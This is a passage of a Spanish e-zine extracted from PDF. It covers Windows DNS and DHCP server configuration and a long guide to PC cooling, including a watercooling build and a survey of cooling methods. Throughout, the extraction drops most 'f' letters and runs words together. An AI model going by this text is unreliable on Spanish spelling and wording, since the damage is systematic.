Una vez abierto el administrador DNS, hay que comprobar si se haagregado algún servidor sobre elque estamos trabajando, aunquehay que tener en cuenta que conesta utilidad podemos administrar otros servidores DNS de orma re-mota. Para ello, hay que seleccionar la opción del menú principal “Acción-Conectar con el quipo”. En la ven-tana “Seleccionar equipo destino”tenemos dos opciones: “Este equi-po” (para seleccionar el equipo localcomo servidor DNS) o “El siguienteequipo” (si queremos administrar unequipo remoto como servidor DNS).Para terminar marcamos la casillade vericación “Conectarse a este

equipo ahora” y pulsamos el botón“Aceptar”.

Pinchando sobre SERVIDOR en laventa principal del administrador del servidor DNS se muestra la con-guración para zonas de búsquedadirecta (conversión de nombres a di-recciones IP) y zonas de búsquedainversa (conversiones de direccionesIP a nombres). Es recomendable queel servidor DNS tenga conguradauna dirección IP estática.Pinchamos sobre “Zonas de búsque-da directa” con el botón secundarioy sobre “Crear una zona nueva…”,

A continuación aparecerá la primeraventana del asistente para crear zo-nas de búsqueda directa, solamentedebemos seguir los pasos que in-dique.

En la siguiente ventana de la cong-

uración de zona nueva, tendremostres opciones, seleccionamos la prim-era para que la nueva zona a denirquede integrada en el Directorio Ac-tivo (Active Directory).

Pulsamos “siguiente” y nos apare-cerá una nueva pantalla del asistenteque es donde vamos a introducir enombre de la nueva zona, por ejem-plo “insecurity.edu” este nombre esque va ser encargado de gestionar eservidor DNS.

Confguración e instalación de directorio activo

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 29/41

Pulsamos “siguiente” para nalizar ladenición de la nueva zona creada,pulsaremos sobre el botón “Final-izar”.

Pinchamos sobre “Zonas de búsque-da inversa” con el botón secundarioy sobre “Crear una zona nueva…”,

A continuación aparecerá la primera

ventana del asistente para crear zo-nas de búsqueda inversa, solamentedebemos seguir los pasos que in-dique.

En la siguiente pantalla, de nuevoseleccionaremos la opción “ActiveDirectory integrado”.

En el siguiente paso debemos especi-car la zona de búsqueda inversa queel DNS debe resolver, introducimoslos tres primeros 8bits de la direcciónIP, o sea todos menos el numero dehost, para que nuestro servidor DNShaga resolución inversa de cualquier 

dirección IP “192.168.0.x”.

Para nalizar se muestra el resumende todo lo introducido asta ahora enla zona de búsqueda inversa, así mis-mo pulsamos el botón “Finalizar”.

Echo todo esto veremos los nuevosparámetros añadidos a los nuevazonas de búsqueda ya sea directa oinversa.

Para terminar la conguraciónDNS, debemos introducir los reen-viadores, esto quiere decir introduciDNS públicos, para cuando un hostinterno quiera resolver algo en inter-net o sea uera de la red local estospuedan resolverlos, para acceder aesta conguración nos situamos so-bre el nombre del servidor pulsamosel botón secundario y pinchamos en“Propiedades”, no aparecerá una pan-talla con pestañas, pues pinchamosen “Reenviadores” , nos jamos quela casilla de vericación donde pone“Habilitar reenviador(es) este mar-cada, a continuación añadimos lasdirecciones IPs de los DNS públicos195.55.30.16 y 194.179.1.101.

CONFIGURACION DE DHCP

Asta ahora nuestro servidor uncio-naria correctamente, claramente in-troduciendo nuestros clientes en edominio y con la conguración tcp/ip con dirección estática, para evitar

esto tenemos que congurar DHCPesto se hace para que el servidorasigne a todos los equipos direccionesIP automáticamente, debemos teneren cuenta que no se puede asignardirecciones IP a el mismo por ello eservidor debe tener un dirección IPestática o asigna por otro servidorDHCP.

Confguración e instalación de directorio activo

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 30/41

En primero lugar debemos compro-bar si el servicio esta instalado, la her-ramienta sobre la que vamos a traba-jar se llama DHCP y la encontramosen el menú “Herramientas adminis-trativas”, muestra una pantalla comola que se muestra a continuación.Esta herramienta se utilizará para lacongurar el servidor y también paracomprobar las direcciones asignadasa estaciones en un momento dado.

En el servidor DHCP se debe especi-car un “ámbito”, es decir, un rangode direcciones IP que se asigna enconjunto de estaciones dentro de lamisma subred.Es posible crear varios ámbitos parasu gestión con el mismo servidor,seleccionando la opción “Ámbito

Crear”. Dentro de cada ámbito esnecesario especicar la dirección IPde la subred, la mascara asociada, elrango de direcciones para asignar,las direcciones de esa asignación(utilizadas por dispositivos o esta-ciones que tienen una IP ja) y lasdirecciones que se reservan paraser asignadas siempre a las mismasestaciones. Cuando se reservar unadirección, hay que especicar en queestación será utilizada, por lo que sedebe identicar mediante su nom-bre NetBIOS y /o su dirección MAC.A continuación muestra como se re-aliza asta asignación.

Final

Espero que el artículo os haya gusta-do, hasta la próxima.

Autor -ZirKua

Confguración e instalación de directorio activo

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 31/41

IntroducciónLa siempre creciente industria de lacomputación está en una búsquedacontinua de nuevas ormas para en-riar microprocesadores. Desde ven-tiladores gigantes hasta nitrógenolíquido, la industria y los entusiastasse esuerzan continuamente paraconseguir mejores y más silencio-sos y conables métodos de enri-amiento. Este artículo terminará ex-aminando un nuevo concepto pararerigeración de microprocesadoresbasados en un antiguo enómenoísico llamado descarga de corona(corona discharge).Métodos para enriar los componen-tes de un computador.Variadas técnicas son usadas en laactualidad para rerigerar compo-nentes electrónicos, como lo son losmicroprocesadores, que ácilmente

pueden alcanzar temperaturas tanaltas que provoquen daño perma-nente si no son mantenidos a unatemperatura adecuada de orma ap-ropiada.

R.L. o Watercooling

Un método más complejo y menoscomún es la rerigeración por agua.El agua tiene un calor especíco más

alto y una mejor conductividad té-rmica que el aire, gracias a lo cualpuede transerir calor más eciente-mente y a mayores distancias que elgas. Bombeando agua alrededor deun procesador es posible remover grandes cantidades de calor de ésteen poco tiempo, para luego ser di-sipado por un radiador ubicado enalgún lugar dentro (o uera) del com-putador.

La principal ventaja de la reriger-ación líquida, es su habilidad paraenriar incluso los componentes máscalientes de un computador.Todo lo bueno del watercoolingtiene, sin embargo, un precio; la re-rigeración por agua es cara, comple-ja e incluso peligrosa en manos sinexperiencia (Puesto que el agua ylos componentes electrónicos no sonbuena pareja).Aunque usualmente menos ruido-

sos que los basados en rerigeraciónpor aire, los sistemas de rerigeraciónpor agua tienen partes móviles y enconsecuencia se sabe eventualmentepueden surir problemas de conabil-idad. Sin embargo, una avería en unsistema de Watercooling (por ejemp-lo, si deja de uncionar la bomba) noes tan grave como en el caso de larerigeración por aire, puesto que lainercia térmica del fuido es bastante

alta e incluso encontrándose estáticono será ácil para el CPU calentarlo aniveles peligrosos.

Montaje de una R.L.

En este tutorial trataré de explicar lomejor posible como montar una re-rigeración líquida, ya que como he-mos leído arriba un sistema de estetipo en manos inexpertas puede ser 

desastroso, con unos resultados nodeseados por el usuario ni por el es-tado en que se encontraría despuésla PC.El tutorial consta de 7 partes:1- La gráca2- El microprocesador 3- El chipset 4- La interconexión de los componentes5- Llenado del circuito y purga6- Presentacion del circuito

7- Resultados

La gráca

Empezaremos este pequeño tutoriaexplicando como adaptar correcta-mente el bloque a nuestra VGA. Tra-bajaremos sobre una ATI X1900XTjunto a un DangerDen Tyee.Primero de todo acondicionar unbuen área de trabajo para estar có-modos y evitarnos problemas. Segui-

damente nos dispondremos a retirarlos tornillos que sujetan el cooler dela VGA.Una vez retirado el cooler nuestragraca presentara un aspecto pare-cido a este. 

Con cuidado retiraremos los restosde pasta que yacen encima del nú-cleo, dejando este limpio de residuose impurezas como se presenta en lasiguiente oto.

Una vez limpio, nos dispondremos aaplicar una capa de pasta térmica, eneste caso hemos usado Artic Silver.El resultado a de ser algo parecido aque se muestra.

Todo Cooling 

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 32/41

Ahora vamos a entrar en materia, yaplicaremos nuestro bloque a la VGAya debidamente acondicionada.Para ello seguiremos las instruc-ciones del abricante.Este es el aspecto de nuestra gracacon el bloque ya instalado.

Finalmente para concluir esta pri-mera parte os muestro una toma,donde podéis ver el peso total delconjunto que alcanza la riolera de

760 gramos en su totalidad.

El Microprocesador Continuamos con nuestra guía, comoanteriormente trabajaremos poco apoco y con paciencia.El primer paso es retirar el BOX oCooler de la CPU.Este será probablemente el aspectode nuestro micro una vez retirado el

disipador.

Como en la primera parte nos di-spondremos a despejar el IHS de losrestos de la pasta, debemos dejar lomas pulido posible la supercie delmicro pero trabajar con cuidado!Una vez limpia la base nos dispon-dremos a aplicar una capa uniormeen este caso volvemos a usar Artic Silver, intentaremos cubrir bien todoel IHS lo mas uniorme posible.

Ya lo tenemos todo listo para inclu-ir el bloque de nuestra RL , seguir las instrucciones de instalación devuestro bloque (normalmente si nose adjuntan, en la pagina ocial sepueden visualizar, a mi me paso conel TDX )

 

Finalmente atornillaremos la placa ala carcasa con el bloque de la CPU.

El chipset Primeramente quitaremos las suje-ciones de nuestro chipset.

 

En mi caso el disipador del chipset vaunido al disipador de los Mosets por un heat-pipes, por lo que tendremosque quitar las sujeciones del disipa-dor en los Mosets.

Una vez extraído el disipador senos presenta el chipset del siguientemodo.

 

Ya que estamos, nos dispondremos aoptimizar el Sourth con unos peque-ños y sencillos pasos

Para ello lo primero que realizaremos

será retirar el disipador. Puede ser qnos resulte diícil, en ese caso nosayudaremos con un destornilladorde punta plana y haciendo palancacon cuidado. Un movimiento derosca agarrando con rmeza el disi-pador también puede servirnos.

Para sacar más rendimiento, aun quesacricando algo de estética, retira-remos el embellecedor del disipadorSi se realiza con cuidado el embel-

lecedor quedara intacto por lo quenos guardamos de poder tramitaralgún RMA ̂ ^ de no ser así la placaperderá su garantía.

Como nos encontramos con un di-sipador conjunto tanto para Chipsetcomo para Mosets se nos hace im-posible aprovechar el disipador porseparado para los Mosets (recor-damos que aplicaremos un bloquenuevo al Chipset.)

Todo Cooling

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 33/41

Por lo tanto y con la ayuda de unadremel nos dispondremos a separar en dos partes el disipador, y así seguir haciendo uso del mismo para losMosets, que junto a su blower nosorece un rendimiento excelente. Cortamos justo a escasos centímet-ros del disipador de los Mosets elheat-pipe. Será un trabajo ácil puesel Heat es hueco.El corte se puede realizar con mu-chas herramientas, caladora, dremel,sierra...Una vez acabador el corte limpiar bien la zona de trabajo de impur-ezasSu resultado:

 

Seguidamente nos dispondremosa limpiar el chipset de los restos depasta (puede ser un trabajo largo)

que puede ser dura y diícil de ex-traer. Para ello utilizamos Alcohol ybastoncillos de algodón.

Con movimientos circulares vamoslimpiando la supercie, es cierto quesi aplicamos calor nos será más ácileliminar los residuos mas adheridos.

Hacemos lo propio con el Sourth,aplicando alcohol, bastoncillos y pa-

cienciaObtendremos un resultado así.

Como con el bloque del Chipset nose nos adjunta ninguna almohadillaprotectora para el chipset he usadolos protectores que adjuntaba un di-sipador de ATI para sus memorias.

Colocando estas almohadillas con lacara que pega hacia arriba.

Ahora aplicamos Artic silver tanto alchipset como al Sourth.

Ya con esto terminado ya solo nosresta colocar los disipadores y elbloque en la placa.Esta es la vistaque presenta

4ª Parte:La interconexión de los com-ponentes

Aun que en el tutorial no se vea re-fejado es importante conectar los tu-bos a los bloques antes de situar losdispositivos dentro de la caja, parano tener que orzar los mismos.Cada persona debería estudiar de-tenidamente el modo en el que va aordenar y distribuir los componentesdentro de la caja así como el recor-rido de los tubos.

Debéis tener en cuenta que lo quemás os va a repercutir en el ren-dimiento de vuestra RL es el recor-rido del circuito.

Inicialmente vamos a preparar eradiador, en este caso usamos unpar de radiadores para aumentarla disipación del liquido, contamosBlackIce pro v2 Doble y un BlackIcextreme simple.

Poseo una Armor, todo la parte ron-tal es un panel perorado por lo quees ideal para situar el radiador tantopara ventilación como disipación demismo, no solo con esto la thermal-take Armor adjunta un dispositivo

para transormar 3 Bahias de 5.25en 3.5 que nos sirve perectamentepara anclar el radiador y usar estebloque como una pieza única. (comoanteriormente e comentado, es muyinteresante estudiar como vais amontar vuestro circuito y potenciaral máximo todo lo que tengáis avuestra disposición)Este es el resultado, BlackIce proDoble + Conversor Bahias (ICage).

Aquí podéis ver el BlackIce Extreme

más tarde los podréis ver conectadosentre si en modo cascada.

Todo Cooling

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 34/41

Podemos ver como se muestran losradiadores aun sin ventiladores en laparte rontal de la carcasa. Aun pre-sentando solo el chasis de la torresiempre es más ácil trabajar 

Instalamos el deposito, en este casohemos usado un DangerDen Fillport,todo y usar deposito lo usamos paraterminar una ‘T’, en un principio nousaba deposito, por cuestiones de es-tética se decidió en ultimo momentoincluirlo (el liquido no regresa al de-posito únicamente unciona comoterminador).

De segunda mano pudimos adquirir un Fillport para acoplar a la perec-

ción con el deposito, para ello tuvi-mos que perorar el techo de nuestracarcasa ;D.

 

La bomba es parte imprescindible esel ultimo dispositivo que nos altabapor nombrar.Trabajamos con una DangerDen D5,la situación es fotante para evitar vi-braciones y colocada en perpendicu-lar contra el primer radiador (primer dispositivos después de la bomba)para una presión máxima.

Cómo podéis ver la bomba no tocael suelo.

Ya tenemos el circuito debidamenteacondicionado, hemos buscadolíneas rectas, recorridos cortos y situ-aciones practicas como la posiciónde la bomba.

Os dejo unas otos del circuito com-pleto donde se pueden ver los dosradiadores conectados en cascada, lasuspensión de la bomba y su orien-tación perpendicular al primer dis-positivo

Todo Cooling

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 35/41

Llenando el circuito y la purga

Preparamos nosotros mismos unasolución que usaremos como liqui-do para nuestro circuito, utilizamosanticongelante UV de alta densidad

al cual le añadimos un 10% de aguadestilada para que la solución no seatan abrasiva con los componentes.

Empezamos a llenar el circuitoCon el llport es tarea ácil aun sinusar depósito.

La purga sin deposito es lenta, enmi caso unas 20horas para tener uncircuito prácticamente purgado, aunque para expulsar todo el aire senecesitara algo mas de tiempoEsto se vera recompensado por la

perdida de presión que nos produceun depósito.

Presentación del circuito

En esta ocasión hemos ido al grano,haciendo un llenado rápido apa-gando y encendiendo la bomba conlo que hemos ahorrado un buenmontón de horas .

Os presento los resultados con el 3bloque .

Para salvar la curva que se presen-taba de VGA a Chipset se a salvadocon un codo 14mm, mejor ahorrarsecantos rectos y poner un codo cur-vo.

Aquí ya hemos contemplamos el cir-cuito con el bloque del chipset mon-tado.

Los resultados

Partiendo de la base, que el Black-Ice pro Doble tiene dos ventis 120aun le tengo que añadir 1 más, yque el BlackIce xtreme Simple estapasivo (la intencion es que lleve dosde 120) Y añadiendo dos más de 120en la caja uno en el techo y otro enla parte posterior. Diremos que lastemperaturas no andan nada mal.

Rerigeración por Aire

La rerigeración pasiva es probable-mente el método más antiguo ycomún para enriar no sólo compo-nentes electrónicos sino cualquier

cosa. Así como dicen las abuelitas“tomar el resco”, la idea es que ocur-ra intercambio de calor entre el aire atemperatura ambiente y el elementoa enriar, a temperatura mayor. Esistema es tan común que no es enmodo alguno invención del hom-bre y la misma naturaleza lo empleaprousamente: miren por ejemplo alos eleantes que usan sus enormesorejas para mantenerse rescos, yno porque las usen de abanico sino

porque éstas están llenas de capilaresy el aire resco enría la sangre quepor ellos circula.

El ejemplo de los eleantes se aplicaentonces, a las técnicas para enriarcomponentes electrónicos, y la ideaes básicamente la misma: incremen-tar la supercie de contacto con eaire para maximizar el calor que éstees capaz de retirar. Justamente con

el objeto de maximizar la superciede contacto, los disipadores o en in-glés heatsinks consisten en cientosde aletas delgadas. Mientras másaletas, más disipación. Mientras másdelgadas, mejor todavía.

Todo Cooling

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 36/41

Rerigeración Pasiva por Aire

Las principales ventajas de la disi-pación pasiva son su inherente sim-plicidad (pues se trata básicamentede un gran pedazo de metal), su

durabilidad (pues carece de piezasmóviles) y su bajo costo. Además delo anterior, no producen ruido. Lamayor desventaja de la disipaciónpasiva es su habilidad limitada paradispersar grandes cantidades decalor rápidamente. Los disipadores(heatsinks) modernos son incapacesde rerigerar eectivamente CPUs degama alta, sin mencionar GPUs dela misma categoría sin ayuda de unventilador.

Los disipadores (heatsinks) moder-nos son usualmente abricados encobre o aluminio, materiales queson excelentes conductores de calor y que son relativamente baratos deproducir. En particular, el cobre esbastante más caro que el aluminiopor lo que los disipadores de cobre

se consideran el ormato premiummientras que los de aluminio son loestándar. Sin embargo, si de verdadquisiéramos conductores premiumpodríamos usar plata para este n,puesto que su conductividad térmicaes mayor todavía. Por eso, aunque elcobre es sustancialmente más caroque el aluminio, es válido decir queambos son materiales baratos... sólopiensen en la alternativa.

Rerigeración Activa por Aire

La reriger-ación activapor aire es, enpalabras sen-

cillas, tomar un sistemapasivo y adi-cionar un el-emento queacelere elfujo de airea través delas aletas delheatsink. Este elemento es usual-mente un ventilador aunque se hanvisto variantes en las que se utiliza

una especie de turbina.

En la rerigeración pasiva tiendea suceder que el aire que rodea aldisipador se calienta, y su capaci-dad de evacuar calor del disipador disminuye. Aunque por convecciónnatural este aire caliente se mueve,es mucho más eciente incorporar un mecanismo para orzar un fujode aire resco a través de las aletasdel disipador, y es exactamente loque se logra con la rerigeración ac-tiva.

Aunque la rerigeración activa por aire no es mucho más cara que lapasiva, la solución tiene desventajassignicativas. Por ejemplo, al tener partes móviles es susceptible deaveriarse, pudiendo ocasionar dañosirreparables en el sistema si es queesta avería no se detecta a tiempo

(en otras palabras, si un sistema pen-sado para ser enriado activamentequeda en estado pasivo por muchotiempo). En segundo lugar, aunqueeste aspecto ha mejorado mucho to-dos los ventiladores hacen ruido. Al-gunos son más silenciosos que otros,pero siempre serán más ruidososque los cero decibeles que produceuna solución pasiva.

Rerigeración Líquida por Inmersión

Una variación extraña de este mecan-ismo de rerigeración es la inmersiónlíquida, en la que un computador es

totalmente sumergido en un líquidode conductividad eléctrica muy bajacomo el aceite mineral. El computa-dor se mantiene enriado por el in-tercambio de calor entre sus partesel líquido rerigerante y el aire deambiente. Este método no es prác-tico para la mayoría de los usuariospor razones obvias.

Pese a que este método tiene unenoque bastante simple (llene un

acuario de aceite mineral y luegoponga su PC adentro) también tienesus desventajas. Para empezar, debeser bastante desagradable el inter-cambio de piezas para upgrade.

Rerigeración por Metal Líquido

Metal Líquido como solución a la re-rigeración de CPUsAl estar llegando ya a su límite las

principales ormas de rerigeraciónla industria necesita una nueva or-ma de rerigeración. Aquí es dondeentra en juego NanoCoolers, que hainventado un sistema único dondese usa metal líquido que posee to-das las capacidades para satisacerlas necesidades actuales de rerig-eración. Parte de la unicidad de estesistema se basa en su simpleza.

Todo Cooling

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 37/41

Todo Cooling

El sistema consta de un metal líquidocomo conductor, una placa para ladisipación de calor del micro, unabomba electromagnética y los tu-bos que conectan todo esto. Por supuesto, también consta de partesque lo interconectan todo, así comode un ventilador y el soporte que al-berga el sistema, etc. Pero la simpli-cidad del sistema es únicaEl metal líquidoOs preguntareis: ¿pero que dier-encias hay entre nuestras rerigera-ciones líquidas y este sistema? Larespuesta es que el metal líquidotiene numerosas ventajas sobre lamezcla que usamos en las RL. Por ejemplo, puede abarcar mucho mas

calor, lo que implica que rerigeraramas rápido. Hierve a 2000ºC, a dier-encia del agua común, que lo hacea 100ºC, lo que le proporciona lacualidad de poder rerigerar ingen-tes cantidades de calor sin cambiar de ase, quitando la concentraciónde calor como un actor limitador.El metal líquido es no-infamable, noes tóxico (lo dudo, pero eso dice suweb) y no daña el medio ambiente.Como metal, conduce muy bien tan-

to el calor como la electricidad. Estole proporciona dos cualidades: quedisipa el calor muy bien y que es po-sible usar bombas electromagnéticaspara mover el líquido.

Ventajas de este sistema:

• Resistencia térmica muy baja• Funcionalidad silenciosa• Fiabilidad debido a la simplicidad

del sistema y a la inexistencia departes móviles• Tamaño total reducido• Soporte de grandes ujos de calor • No importa la orientación delsistema• Permite la refrigeración de variasuentes de calor • Control de gaste energético depen-diendo de las necesidades de rerig-eración

A dierencia del agua, este com-puesto puede ser bombeado elec-tromagnéticamente, eliminando lanecesidad de una bomba mecánica.A pesar de su naturaleza innova-dora, el metal líquido de nano-

Coolers nunca alcanzó una etapacomercial.

Rerigeración Termoeléctrica(TEC)

En 1834 un frances llamado JuanPeltier (no es chiste, la traducciónal español de Jean Peltier), des-cubrio que aplicando una dier-encia electrica en 2 metales osemiconductores (de tipo p y n)unidas entre sí, se generaba unadierencia de temperaturas entrelas uniones de estos. La gura deabajo muestra que las unionesp-n tienden a calentarse y las n-pa enriarse.

El concepto rudimentario de Pel-tier ué paulatinamente perec-ciónado para que uera un solobloque con las uniones semi-conductoras, (que generalmenteson en base a Seleniuro de An-

timonio y Telururo de bismuto)conectadas por pistas de cobrey dispuestas de tal manera , quetransportara el calor desde unade sus caras hacia la otra, haci-endo del mecanimo una “bombade calor” ya que es capaz de ex-traer el calor de una determinadasupercie y llevarlo hacia su otracara para disiparlo.

Una de las tantas gracias de estossistemas de rerigeración que se ocu-pan en todo ámbito (generalmenteindustrial), es que son bastanteversátiles, basta con invertir la polari-dad para invertir el eecto (cambiarel lado que se calienta por el río yviceversa), la potencia con que en-ría es ácilmente modicable depen-diendo del voltaje que se le apliquey es bastante amable con el medioambiente ya que no necesita de gas-es nocivos como los usados en losrerigeradores industriales para re-alizar su labor.

El uso de rerigeración termoeléc-trica por lo general se circunscribe

al ámbito industrial, pero tanto losanáticos como algunos abricanteshan desarrollado productos que in-corporan el elemento Peltier comométodo para enriar el procesadorde un PC. Estas soluciones, que depor sí involucran un uerte aumentodel consumo eléctrico (toda vez queun peltier es bastante demandantede potencia) no pueden operar porsí solas, pues se hace necesario unsistema que sea capaz de retirar calor

de la cara caliente del Peltier.

Rerigeración por Heatpipes

Denición: Heat Pipe traducido vienea signicar algo así como tubería decalor. Y la verdad es q la deniciónse ajusta bastante al concepto en smismo.Funcionamiento: bueno vamos ameollo del asunto.

Este es el esquema básico del un-cionamiento de un HeatPipe (másadelante complicaremos un poco lacosa).

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 38/41

Todo Cooling

Básicamente un Heat Pipe es un tubohueco, relleno de un fuido. Uno de

los extremos del tubo se coloca so-bre un generador de calor (en el casoque nos ocupa, sobre el core de unmicroprocesador).

A: el extremo del cilindro con el fu-ido activo, reposa sobre un genera-dor de calor.

B: la supercie del HeatPipe trans-mite el calor, al fuido activo, el cualaumenta su temperatura y comienzaa evaporarse.

C: el líquido evaporado asciendehasta la sección de condensación,que será donde se libera el calor delfuido (se enría), y este se condensa,volviendo a estado líquido.

D: el fuido activo vuelve hacia lazona de evaporación debido a lagravedad.

Cambio de Fase

Los sistemas de enriamiento por cambio de ase se basan en la mismamáquina térmica que opera en todorerigerador. Aunque los sistemas

han cambiado mucho desde los prim-eros rerigeradores -empezando por el abandono de los gases que erandañinos para el medio ambiente- elprincipio es el mismo: utilizar a nues-tro avor la ley de los gases perectosy las propiedades termodinámicasde un gas para instigarlo a tomar oceder calor del o al medio ambienteen distintos puntos del ciclo.

El cambio de ase es el método de

enriamiento preerido en rerigera-dores comerciales y algunos siste-mas de aire acondicionado, pero enel campo de la computación se vemuy poco. En un primer acercamien-to algunos técnicos en rerigeraciónacionados al overclock implemen-taron máquinas artesanales paraaplicar rerigeración por cambio dease al PC, pero en los últimos añosse viene viendo de orma cada vezmás recuente la aparición de siste-mas comerciales, más compactos,estilizados y -por supuesto- caros.

Los overclockeros extremos no

miran con muy buenos ojos estas so-luciones comerciales principalmentepor dos razones. Primero, las necesi-dades de enriamiento de cada plata-orma son distintas, y aunque es im-probable que el PC vaya a calentarseutilizando un sistema de cambio dease, sí puede darse que la solucióncomercial sea insuciente para llegar a temperaturas extremadamente ba-jas.

En segundo lugar, hoy por hoy eciclo clásico que se ilustra en el es-quema ha sido renado y paulatina-mente reemplazado por circuitos encascada, en donde hay varios ciclosde rerigeración por cambio de asey cada uno enría al siguiente.

Cambio de ase por vibración

El Vibration Induced Droplet Atomi-zation (VIDA) es un sistema experi-mental que probablemente nuncase utilizará comercialmente pero porlo ingenioso que resulta vale la penamencionarlo. En rigor, dudé mucho subicarlo como un subconjunto de lossistemas de cambio de ase porque

el principio de su uncionamiento nose basa en el ciclo térmico que in-ventó Carnot, pero de todos modosel enómeno ísico mediante el cuase retira calor es en buenas cuentasun cambio de ase.

El VIDA opera de la siguiente maneraatomizando un fuido que puede sersimplemente agua, y sometiéndolo auna intensa vibración, se logra que

éste pase al estado gaseoso a tem-peratura ambiente. Al evaporarse, eagua (o el líquido que se utilice) tomauna gran cantidad de calor del mediocircundante. En otras palabras, unagótula de agua lo sucientementepequeña y convenientemente zan-goloteada se convertirá en vapor es-pontáneamente, y si logras que elloocurra en contacto con la superciedeseada, el agua retirará de ella unagran cantidad de calor.

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 39/41

Todo Cooling

Criogenia

Incluso más raro que la rerigeraciónpor cambio de ase es aquella bas-ada en la criogenia, que utiliza ni-trógeno líquido o hielo seco (dióxido

de carbono sólido). Estos materialesson usados a temperaturas extrema-damente bajas (el nitrógeno líquidoebulle a los -196ºC y el hielo seco lohace a -78ºC) directamente sobreel procesador para mantenerlo río.Sin embargo, después que el líquidorerigerante se haya evaporado por completo debe ser reemplazado.Daño al procesador a lo largo deltiempo producto de los recuentescambios de temperatura es uno de

los motivos por los que la criogeniasólo es utilizada en casos extremosde overclocking y sólo por cortosperiodos de tiempo.

Respecto de este método extremo,en CHW podríamos decir que ten-emos cierta experiencia. En experi-mentos como el legendario ProyectoKill Pi o en el campeonato nacionalde Overclock utilizamos el métododel hielo seco con excelentes resul-tados.

Propulsión de aire electrostáticoy el eecto de descarga corona

Un nuevo tipo de tecnología dererigeración ultra-delgada y silen-ciosa para procesadores está siendodesarrollada por Tecnologías Avan-zadas Kronos en colaboración conIntel y la Universidad de Washing-ton.

En dos años, esta nueva tecnologíapodría reemplazar las actuales técni-cas de enriamiento por ventiladoresen notebooks y otros dispositivosportátiles, volviéndolos más con-ables y mucho más silenciosos.La tecnología de rerigeración queestá siendo desarrollada por Kro-nos emplea un dispositivo llamado“bomba de viento iónico” (ionic windpump), un acelerador de fuidoselectrostáticos cuyo principio bási-co de operación es la descarga por eecto corona. Este enómeno ocurrecuando el potencial de un conductor cargado alcanza una magnitud talque sobrepasa la rigidez dieléctricadel fuído que lo rodea (por ejemplo

aire) este aire, que en otras circun-stancias es un excelente aislante,se ioniza y los iones son atraídos yrepelidos por el conductor a granvelocidad, produciéndose una des-carga eléctrica que exhibe penachoso chispas azules o púrpura, y que asu vez moviliza el fuido. La descargapor eecto corona es similar a lo queocurre con la caída de un rayo, salvoporque en ese caso no hay un con-ductor propiamente tal, la dierencia

de potencial eléctrico es tan enormeque los rayos son capaces de atrave-sar ácilmente 5 kilómetros de aire,que por lo general es uno de los me-jores aislantes que existen.

Para aprender más acerca de la tec-nología de enriamiento de Kronos, elsitio The Future o Things entrevistóal proesor Alexander Mamishev y alestudiante de doctorado Nels Jewell-Larsen de la Universidad de Wash-ington (Washington University) y alDr. Igor Krichtaovitch, Ocial en Jeede Tecnología (Chie TechnologyOcer) de Tecnologías AvanzadasKronos (Kronos Advanced Technolo-gies).

DespedidaEn este artículo hemos dado todotipo de conceptos sobre los tipos dererigeración y el moteje de un tipoespecico al que se considera de

mayor importancia, la rerigeraciónlíquida, este tipo de rerigeración esel que mejor resultados nos da a lahora de querer bajar la temperatu-ra de nuestra pc, por supuesto hayotros tipos que también dan muchosresultados como es el caso de losheatpipes, pero no solo esos tiposdan buenos resultados, en generatodos dan buenos resultados, peroeso depende de para que necesite-mos enriar nuestra PC, es evidenteque si queremos hacer overclockingextremo no le pondremos reriger-ación por aire, cada tipo de reriger-ación se adapta a un tipo de necesi-dad, la más aclamada suele ser la deoverclock normal, para este tipo dererigeración las más recomendadasson por heatpipes o R.L., está últimada mejores resultados que la primerapero es más cara. También las otrasrerigeraciones como por aire, no

suelen utilizarse para el overclock, yaque son utilizadas de serie. Las otrascomo la rerigeración termo eléctricaserán utilizadas en mini portátiles yPDAs, una de las también que pareceque tendrá uturo será la del vientoiónico probablemente sea utilizadoen portátiles como alternativa de lasbases con ventiladores, además deesas en este artículo, se encontrabala rerigeración por metal líquidoque desgraciadamente no alcanzó e

éxito comercial. Este es el resumengeneral de todo el artículo, y una re-comendación, para que los usuariossepan que tipo de rerigeración lesconviene para su caso.

Autor- Sknight y HNAFE

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 40/41

Comunidades Participantes

 _TuXeD_ 

WHK, B0rn2kill

Isirius, Skapunky, peibol 4.0

Zirkua, Sknight, HNAFE, TxShack 

E0N

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 41/41

e-Zine InSecurity Nº1

WislaxBlind Connection-Reset Programación ShellNetworkingInyección DLLCreando una Máquina Virtual

e-Zine InSecurity Nº2

Ataque de ragmentaciónVirus indetectables el método MEEPADiseño de AlgoritmosFortalecer los permisos de los usuariosBackTrack Ati y su soporte en GNU/Linux